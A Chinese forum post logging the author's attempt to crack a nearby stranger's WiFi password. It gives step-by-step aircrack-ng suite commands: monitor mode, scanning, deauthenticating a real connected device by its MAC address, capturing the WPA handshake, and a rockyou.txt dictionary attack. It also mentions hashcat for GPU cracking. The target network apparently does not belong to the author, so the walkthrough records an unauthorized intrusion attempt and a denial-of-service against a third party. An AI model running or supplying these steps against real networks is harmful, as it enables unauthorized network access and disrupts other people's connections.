电脑疯子技术论坛|电脑极客社区

微信扫一扫 分享朋友圈

已有 1240 人浏览分享

心动的WiFi——WiFi爆破学习记录

[复制链接]
1240 0
前言:

看着附近的WIFI 灵机一动 上网搜索了一下教程于是决定做一个试验。在此记录一下试验过
程和结果仅作为学习记录。

试验环境:
台式机
Kali虚拟机
无线网卡
菜鸡一只

试验过程:

一、无线网卡安排

1.主机USB接口直接怼入无线网卡  Kali虚拟机弹窗提示 选择连接到虚拟机 选中Kali 点击确定。看到有些教程说需
要安装驱动这可能跟所购买的无线网卡是否免驱有关 我这里是免驱版的。直接怼入即可使用。

QQ截图20210927152213.png

​2.1.此时在Kali的网络连接处就可以看到 虚拟机可以搜索到附近的WIFI。说明网卡怼入成功。

QQ截图20210927152246.png

​2.2.打开终端输入ifconfig查看网卡 存在wlan0。也说明网卡怼入成功。

100.png

​2.3.终端输入iwconfig,存在网卡wlan0 也说明网卡怼入成功。

99.png

2.4.虚拟机检查可移动设备,可以清楚的看到无线网卡的型号。也是说明网卡怼入成功。

98.png

二、握手包抓取

1.1.输入命令,清除系统中可能影响监听的进程:
  1. airmon-ng check kall
复制代码

1.2.开启网卡监听:
  1. airmon-ng start wlan0
复制代码

1.3.检查是否成功开启监听:(可以看到wlan0变成了wlan0mon,说明成功开启监听模式)
  1. iwconfig
复制代码

97.png

2.开始探测附近的WIFI:
  1. airodump-ng wlan0mon
复制代码

主要看三个参数:
BSSID:路由器的MAC地址
PWR:信号值,绝对值越低,说明信号越强
CH:当前路由器使用的信道

96.png

​3.找一个信号比较强的WIFI进行监听,这里选择了一个小米的WIFI BSSID为:64:64:4A:E3:90:41
使用的信道为1,输入命令,开始监听:
  1. airodump-ng --bssid 64:64:4A:E3:90:41 -c 1 -w test wlan0mon
复制代码

参数说明:
–bssid:路由器的MAC地址
-c:路由器使用的信道
-w:抓取的握手包名称,可以选择输出的路径,这里使用默认输出路径为根目录

(下图说明:BSSID为路由器MAC地址,STATION为当前连接在路由器上的设备的MAC地址)

93.png

4.另外再打开一个终端,对当前正在连接的某个设备进行攻击,使其断开与路由器的连接。原理没有深究大概
使向目标发送大量数据,或者类似于ARP欺骗的攻击,使设备与路由器断开连接,停止攻击后,设备会自动连
接上路由器,此时就可以抓取到握手包。
  1. aireplay-ng -0 10 -a 64:64:4A:E3:90:41 -c 9C:2E:A1:9F:9E:2F wlan0mon
  2. 或者 aireplay-ng --deauth 10 -a 64:64:4A:E3:90:41 -c 9C:2E:A1:9F:9E:2F wlan0mon
复制代码

参数说明:
-0、–deauth:指定对目标进行攻击的次数
-a:路由器的MAC地址
-c:目标MAC地址

92.png

​5.等待攻击完成,此时在第一个终端会显示握手包抓取成功,如下图:

91.png

6.在根目录生成有一些握手包文件,其中包含test-01.cap

QQ截图20210927155528.png

三、爆破开启

1.在终端输入命令:
  1. aircrack-ng -w /usr/share/wordlists/rockyou.txt test-01.cap
复制代码

参数说明:
-w:指定一个密码文件,这里使用的是Kali自带的密码文件,可以在文件系统中找到。

(PS:我一开始使用此命令时报错,缺少-w参数,然后进入密码存放文件路径中发现 自带的密码是一个压缩包需要
先解压才能用,源文件为:rockyou.txt.gz。后面的.cap文件 如果一开始更改的存放的位置需要加上完整的路径

90.png

试验结果:

等待爆破结束:(很遗憾,密码字典不够强大,没有爆破出来,密码正确会显示在终端)

89.png

个人总结:

感觉就是学习了一个工具的大概使用过程,aircrack-ng原理是使用CPU去跑包,全程不需要联网破解速度看个人CPU的性能。
此间还看到了一个利用显卡GPU去跑字典的教程 前期一样的是抓取握手包。然后使用hashcat这个工具进行爆破据说速度
比aircrack-ng快的多。还有一些其他的工具,如:EWSA(与hashcat原理差不多)
(一样做了试验,但是hashcat没跑起来,原因是:我的电脑显卡是集成显卡 太垃圾了。需要独立显卡才可以跑)

(PS:穷举爆破这种事关键还是字典和目标密码强度 个人脸黑看来得自己尽快搞个WIFI了)

您需要登录后才可以回帖 登录 | 注册

本版积分规则

1

关注

0

粉丝

9021

主题
精彩推荐
热门资讯
网友晒图
图文推荐

Powered by Pcgho! X3.4

© 2008-2022 Pcgho Inc.